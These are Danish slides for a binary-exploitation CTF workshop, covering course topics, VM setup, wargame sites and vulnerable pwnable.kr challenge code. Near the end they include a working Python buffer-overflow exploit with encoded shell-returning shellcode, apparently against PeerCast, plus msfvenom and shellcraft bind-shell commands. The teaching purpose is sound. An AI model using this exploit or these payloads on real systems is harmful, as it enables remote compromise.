Hakker?

../images/trivial_question.jpg

Hakker?

../images/trivial_answer.jpg

Prosas binary hacking workshop

Aftenens formål:

  • At introducere emnerne for de øvrige aftener
  • At introducere den software, som vi kommer til at bruge
  • At løse et par hacker challenges
  • At introducere pwntools

Prosas binary hacking workshop

Formål med workshoppen:

At blive istand til at løse CTF opgaver som involverer programmer i binær form

ProsaCTF 2014

../images/ctf2014_teams.png

ProsaCTF 2014

../images/ctf2014_crackme.png

ProsaCTF 2014

../images/ctf2014_bof.png

ProsaCTF 2014

../images/ctf2014_trampolining.png

ProsaCTF 2014

../images/ctf2014_ret2libc.png

Krav for deltagelse

Ingen! Vi er her for at lære. Men følgende vil hjælpe:

  • Linux command line
  • Programmere Python
  • Programmere eller læse C
  • Interesse i system arkitektur og operativ systemer

Indhold dag 1 - Reverse Engineering

  • Værktøjer
  • i386 assembly
  • Compilerer genereret kode
  • Calling conventions
  • Stack layout og indhold

Indhold dag 2 - Exploitation

  • Stack based buffer overflows
  • Brug af GNU debugger
  • Brug af pwntools under udvikling af exploits
  • Omgåelse af ASLR
  • Omgåelse af stack canaries
Note
 Sårbarhed/vulnerability = fejl i software som har betydning for sikkerheden i softwaren. Exploit = software som udnytter en sårbarhed til at opnå et eller andet mål som ikke var tilsigtet med den sårbare software.

Indhold dag 3 - Shellcoding

  • Udvikling af shellcode til i386/Linux
  • Udvikling med pwntools
  • Typiske udfordringer under shellcoding

Indhold dag 4 - Advanced Exploitation

  • Format string vulnerabilities
  • Arbitrary Read/Write primitives
  • Info leaks
  • GOT overwrites
  • Omgåelse af no execute via ret2libc
  • Omgåelse af no execute via Return Oriented Programming

Indhold dag 5 - Final exam/CTF

../images/CTF.png

Software som bruges i workshoppen

På din maskine:

Hent den virtuelle maskine

$ git clone https://github.com/RobertLarsen/ProsaWorkshop.git

Start den virtuelle maskine

$ cd ProsaWorkshop
$ vagrant up

Stop den virtuelle maskine

$ cd ProsaWorkshop
$ vagrant suspend

Opdater den virtuelle maskine

$ cd ProsaWorkshop
$ git pull
$ vagrant destroy -f
$ vagrant up

Forbind til den virtuelle maskine

Enten:

$ cd ProsaWorkshop
$ vagrant ssh

Eller (user=vagrant password=vagrant):

../images/putty.png

Wargames - Over The Wire

http://overthewire.org/wargames/bandit/

../images/overthewire.png

Wargames - VulnHub

https://www.vulnhub.com/

../images/vulnhub.png

Wargames - Smash The Stack

http://io.smashthestack.org/

../images/smashthestack.png

Wargames - Microcorruption

https://microcorruption.com

../images/microcorruption.png

Wargames - pwnable.kr

https://pwnable.kr/

../images/pwnable.png

Wargames - pwnable.tw

https://pwnable.tw/

../images/pwnable_tw.png

Wargames - ctftime

http://ctftime.org/

../images/ctftime.png

Wargames - CTF Repository

http://shell-storm.org/repo/CTF/

../images/ctf_repo.png

pwnable.kr - Toddler’s Bottle - cmd1

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

pwnable.kr - Toddler’s Bottle - cmd1

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/fuckyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

pwnable.kr - Toddler’s Bottle - cmd2

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

pwnable.kr - Toddler’s Bottle - cmd2

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    system( argv[1] );
    return 0;
}

pwnable.kr - Toddler’s Bottle - blackjack

Hey! check out this C implementation of blackjack game! I found it online

http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html (http://korturl.dk/4nh)

I like to give my flags to millionares.

how much money you got?

Running at : nc pwnable.kr 9009

pwnable.kr - Toddler’s Bottle - blackjack - Sårbarhed 1

Alle kald til rand():

// Linje 229
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Linje 304
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Linje 374
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Linje 444
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Linje 514
srand((unsigned) time(NULL)); //Generates random seed for rand() function
random_card = rand()%4+1;

// Linje 639
srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function
z=rand()%13+1;

pwnable.kr - Toddler’s Bottle - blackjack - Sårbarhed 2

// Linje 721
int betting() //Asks user amount to bet
{
    printf("\n\nEnter Bet: $");
    scanf("%d", &bet);

    if (bet > cash) //If player tries to bet more money than player has
    {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet;
    }
    else return bet;
} // End Function

pwnable.kr - Toddler’s Bottle - blackjack - Sårbarhed 3

// Linje 28
int bet;

// Linje 723
printf("\n\nEnter Bet: $");
scanf("%d", &bet);

// Hvis man vinder
cash = cash+bet;

// Hvis man taber
cash = cash - bet;

pwnable.kr - Toddler’s Bottle - lotto

Mommy! I made a lotto program for my homework.

do you want to play?

ssh lotto@pwnable.kr -p2222 (pw:guest)

pwntools - Hvorfor ikke Metasploit?

vagrant@localhost:~$ time shellcraft -f r amd64.linux.bindsh 7777 >/dev/null

 real    0m0.687s
 user    0m0.241s
 sys     0m0.320s
vagrant@localhost:~$ time msfvenom -p linux/x64/shell_bind_tcp LPORT=7777 >/dev/null 2>&1

 real    0m6.595s
 user    0m1.928s
 sys     0m4.146s

pwntools - Hvorfor ikke Metasploit?

vagrant@localhost:~$ find .repositories/metasploit-framework/modules/exploits/linux -name '*.rb' | xargs wc -l | sort -nr | tail -n 1
    67 .repositories/metasploit-framework/modules/exploits/linux/http/peercast_url.rb

pwntools - Hvorfor ikke Metasploit?

#!/usr/bin/env python2

from pwn import *
import sys

#Generated with:
#shellcraft i386.linux.findpeersh | msfvenom --encoder x86/shikata_ga_nai --bad-chars '\x00\x0a\x0d\x20\x2f\x3d\x3b' --arch x86 --platform linux --format python
buf =  ""
buf += "\xbd\xf4\x6e\x99\x72\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b"
buf += "\xc9\xb1\x10\x83\xee\xfc\x31\x6e\x10\x03\x6e\x10\x16"
buf += "\x9b\xf3\x8d\xbc\x63\x8d\x97\x1b\x32\xe7\x31\xc3\x8c"
buf += "\x7a\xf1\xd7\xf0\xef\x0e\x77\x3c\x6f\x8b\xb7\xdf\x2a"
buf += "\xe1\xda\xa9\x38\x63\x27\xf3\xf7\x1e\x18\x5b\xc5\x5f"
buf += "\x13\xa3\xbf\x37\xb3\x7c\x6f\xe7\x30\xeb\x40\x95\xdf"
buf += "\x85\x17\xba\x2e\x93\x42\x36\x08\xba\x5e\xc8"

r = remote(sys.argv[1], 80)
r.send('GET /stream/?' + 'A' * 780 + p32(0x080922f7) + buf + '\r\n\r\n')
r.interactive()

pwntools

Intro tid

Selvstudie - Video

Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration http://www.opensecuritytraining.info/IntroX86.html (12:08:24)

Introduction To Reverse Engineering Software http://www.opensecuritytraining.info/IntroductionToReverseEngineering.html (6:47:55)

Introduction To Software Exploits http://www.opensecuritytraining.info/Exploits1.html (9:38:54)